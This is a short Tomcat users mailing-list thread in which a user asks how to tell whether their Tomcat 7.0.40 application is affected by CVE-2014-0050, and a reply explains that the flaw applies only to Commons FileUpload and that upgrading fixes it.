Need info on CVE-2014-0050

[Aditi Sinha]

Hi,

We are using Tomcat 7.0.40 as web server. It deploys a REST based(Jersey)
web application where few requests are multipart requests. These requests
accept byte array input.

We tried to reproduce this vulnerability by sending more than 4091
characters in the boundary field. The request failed with 400 status.

How can we confirm if our application is vulnerable or not to
CVE-2014-0050?

Thanks  Regards,
Aditi

RE: Need info on CVE-2014-0050

[Caldarale, Charles R]

 From: Aditi Sinha [mailto:adisinha0...@gmail.com] 
 Subject: Need info on CVE-2014-0050

 We are using Tomcat 7.0.40 as web server.

 How can we confirm if our application is vulnerable or not to CVE-2014-0050?

Read the relevant security pages:
http://tomcat.apache.org/security-7.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0050

Are you using Apache Commons FileUpload or a variant thereof?  If not, then 
CVE-2014-0050 doesn't apply.  If you are using FileUpload directly, rebuild 
your webapp with the newer version.  If you're using Tomcat's implementation of 
FileUpload, you should upgrade to 7.0.52 or newer.

 - Chuck


THIS COMMUNICATION MAY CONTAIN CONFIDENTIAL AND/OR OTHERWISE PROPRIETARY 
MATERIAL and is thus for use only by the intended recipient. If you received 
this in error, please contact the sender and delete the e-mail and its 
attachments from all computers.


-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: Need info on CVE-2014-0050

[Aditi Sinha]

Thanks Chuck. We are not using Apache Commons FileUpload or Tomcat's
implementation of FileUpload.